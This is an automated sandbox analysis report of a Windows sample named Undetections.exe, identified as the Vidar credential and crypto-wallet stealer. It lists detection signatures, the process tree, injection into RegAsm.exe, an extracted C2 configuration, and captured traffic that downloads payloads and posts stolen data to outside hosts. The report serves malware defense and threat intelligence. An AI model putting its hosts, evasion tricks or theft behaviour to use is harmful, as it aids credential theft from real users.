Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Undetections.exe

Overview

General Information

Sample name:Undetections.exe
Analysis ID:1423660
MD5:3af8847a68f187e5425af04cfe48d1cf
SHA1:51005458a440023c8537db8a72f19094b91837b4
SHA256:d241425f895f1f32b3f619c33d9b95820a25feb7ded489d449f36ac3c96b9865
Tags:exe
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Vidar
Yara detected Vidar stealer
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential key logger detected (key state polling based)
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • Undetections.exe (PID: 7308 cmdline: "C:\Users\user\Desktop\Undetections.exe" MD5: 3AF8847A68F187E5425AF04CFE48D1CF)
    • spoofer.exe (PID: 7592 cmdline: "C:\Users\user\AppData\Roaming\Undetections\spoofer.exe" MD5: 96EF850D149542B53F033375B1C50CC9)
      • conhost.exe (PID: 7600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • RegAsm.exe (PID: 7652 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199662282318"], "Botnet": "911b907d575a663515ef24804cc499f0", "Version": "8.8"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Undetections.exeJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

    PCAP (Network Traffic)

    SourceRuleDescriptionAuthorStrings
    sslproxydump.pcapJoeSecurity_Vidar_2Yara detected VidarJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000002.00000002.1756042307.0000000004175000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            00000000.00000000.1639618593.0000000000478000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              00000000.00000002.4104859280.0000000005390000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                Click to see the 6 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                2.2.spoofer.exe.4175570.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  4.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                    2.2.spoofer.exe.4175570.0.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                      4.2.RegAsm.exe.400000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                        0.2.Undetections.exe.5390000.12.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                          Click to see the 3 entries

                          Sigma Signatures

                          No Sigma rule has matched

                          Snort Signatures

                          No Snort rule has matched

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus detection for dropped file
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeAvira: detection malicious, Label: TR/AD.Nekark.gilay
                          Found malware configuration
                          Source: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199662282318"], "Botnet": "911b907d575a663515ef24804cc499f0", "Version": "8.8"}
                          Multi AV Scanner detection for dropped file
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeReversingLabs: Detection: 60%
                          Multi AV Scanner detection for submitted file
                          Source: Undetections.exeVirustotal: Detection: 30%Perma Link
                          Source: Undetections.exeReversingLabs: Detection: 26%
                          Machine Learning detection for dropped file
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeJoe Sandbox ML: detected
                          Machine Learning detection for sample
                          Source: Undetections.exeJoe Sandbox ML: detected
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00411600 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,4_2_00411600
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00406EB0 CryptUnprotectData,LocalAlloc,LocalFree,4_2_00406EB0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00409110 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,PK11_FreeSlot,lstrcat,PK11_FreeSlot,lstrcat,4_2_00409110
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00406E30 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,4_2_00406E30
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D0A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,4_2_69D0A9A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D30180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,4_2_69D30180
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D043B0 PK11_PubEncryptPKCS1,PR_SetError,4_2_69D043B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D525B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,4_2_69D525B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D044C0 PK11_PubEncrypt,4_2_69D044C0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D04440 PK11_PrivDecrypt,4_2_69D04440
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CD4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,4_2_69CD4420
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D2A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,4_2_69D2A730
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CEE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,4_2_69CEE6E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D0A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,4_2_69D0A650
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CE8670 PK11_ExportEncryptedPrivKeyInfo,4_2_69CE8670
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D03850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,4_2_69D03850
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D09840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,4_2_69D09840
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D2DA40 SEC_PKCS7ContentIsEncrypted,4_2_69D2DA40
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CE7D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,4_2_69CE7D60
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D2BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,4_2_69D2BD30
                          Source: Undetections.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                          Source: unknownHTTPS traffic detected: 193.109.246.100:443 -> 192.168.2.4:49732 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 193.109.246.100:443 -> 192.168.2.4:49741 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.102.129.112:443 -> 192.168.2.4:49742 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 95.217.212.139:443 -> 192.168.2.4:49743 version: TLS 1.2
                          Source: Undetections.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000004.00000002.2156275105.000000006F8AD000.00000002.00000001.01000000.00000012.sdmp, mozglue[1].dll.4.dr, mozglue.dll.4.dr
                          Source: Binary string: freebl3.pdb source: freebl3.dll.4.dr, freebl3[1].dll.4.dr
                          Source: Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed#fontawesome.sharpQcostura.fontawesome.sharp.dll.compressed source: Undetections.exe
                          Source: Binary string: freebl3.pdbp source: freebl3.dll.4.dr, freebl3[1].dll.4.dr
                          Source: Binary string: C:\Users\Ilham-PC\Documents\Visual Studio 2015\Projects\Siticone.UI\Build\Release\Siticone.UI.WinForms\Siticone.UI.pdbBSJB source: Undetections.exe, 00000000.00000002.4104859280.0000000005390000.00000004.08000000.00040000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003E21000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003B97000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000004.00000002.2155852883.0000000069DDF000.00000002.00000001.01000000.00000011.sdmp, nss3[1].dll.4.dr, nss3.dll.4.dr
                          Source: Binary string: C:\projects\fontawesome-sharp\FontAwesome.Sharp\obj\Release\net472\FontAwesome.Sharp.pdb source: Undetections.exe, 00000000.00000002.4082954500.00000000029FA000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003941000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4107042182.0000000005BF0000.00000004.08000000.00040000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003A61000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: costura.costura.pdb.compressed source: Undetections.exe
                          Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.4.dr, softokn3.dll.4.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.4.dr, vcruntime140[1].dll.4.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.4.dr, msvcp140.dll.4.dr
                          Source: Binary string: costura.costura.pdb.compressedlBkq source: Undetections.exe, 00000000.00000002.4082954500.0000000002941000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: nss3.pdb source: RegAsm.exe, 00000004.00000002.2155852883.0000000069DDF000.00000002.00000001.01000000.00000011.sdmp, nss3[1].dll.4.dr, nss3.dll.4.dr
                          Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000004.00000002.2139779376.0000000013747000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2152326943.00000000196B8000.00000002.00001000.00020000.00000000.sdmp, sqln[1].dll.4.dr
                          Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000004.00000002.2156275105.000000006F8AD000.00000002.00000001.01000000.00000012.sdmp, mozglue[1].dll.4.dr, mozglue.dll.4.dr
                          Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: Undetections.exe
                          Source: Binary string: softokn3.pdb source: softokn3[1].dll.4.dr, softokn3.dll.4.dr
                          Source: Binary string: C:\Users\Ilham-PC\Documents\Visual Studio 2015\Projects\Siticone.UI\Build\Release\Siticone.UI.WinForms\Siticone.UI.pdb source: Undetections.exe, 00000000.00000002.4104859280.0000000005390000.00000004.08000000.00040000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003E21000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003B97000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:\7xp79cm1d4qf1g\obj\Release\Beyound.pdb source: spoofer.exe.0.dr
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00401120 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,4_2_00401120
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040D200 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_0040D200
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00416370 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,strtok_s,memset,lstrcat,strtok_s,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,4_2_00416370
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040A410 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,4_2_0040A410
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00417420 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,4_2_00417420
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00416BC0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,4_2_00416BC0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040AF10 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,4_2_0040AF10
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00417010 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,4_2_00417010
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040A860 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,4_2_0040A860
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004167B0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,4_2_004167B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 4x nop then jmp 16DE2BE0h0_2_16DE2A98
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 4x nop then jmp 16DE38D2h0_2_16DE2244
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_16DEA708
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 4x nop then jmp 16DE38D2h0_2_16DE3078
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]0_2_16E24FA3
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]0_2_16E2BD98
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 4x nop then jmp 16E2F8B2h0_2_16E2F2A0
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 4x nop then inc dword ptr [ebp-10h]0_2_16E2F2A0

                          Networking

                          barindex
                          C2 URLs / IPs found in malware configuration
                          Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199662282318
                          Yara detected Generic Downloader
                          Source: Yara matchFile source: 0.2.Undetections.exe.5390000.12.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.Undetections.exe.3ba19f0.6.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.Undetections.exe.3e21a10.11.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.4104859280.0000000005390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/z-Closing.txt HTTP/1.1Host: universalbeure.usite.proConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/hwid.txt HTTP/1.1Host: universalbeure.usite.pro
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/qwxisix/hwids.txt HTTP/1.1Host: universalbeure.usite.pro
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/qwxisix/Undetections/BuildLink.txt HTTP/1.1Host: universalbeure.usite.pro
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/qwxisix/Undetections/BuildName.txt HTTP/1.1Host: universalbeure.usite.pro
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/qwxisix/Undetections/BuildZipName.txt HTTP/1.1Host: universalbeure.usite.pro
                          Source: global trafficHTTP traffic detected: GET /spoofer.zip HTTP/1.1Host: ashjghas.ucoz.netConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /profiles/76561199662282318 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                          Source: Joe Sandbox ViewIP Address: 104.102.129.112 104.102.129.112
                          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                          Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKEGIJEHJDGDHJKJKKJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBKECAFIDAFIECBKEHDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGIIIDAKJDHJKFHIEBFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCAECGIEBKJKEBGDHDAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Content-Length: 7105Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /sqln.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AEHIDAKECFIEBGDHJEBKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEBGHCBAEGDHIDGCBAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Content-Length: 1529Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGIJEGHDAECAKECAFCAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BKEBFHIJECFIDGDGCGHCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
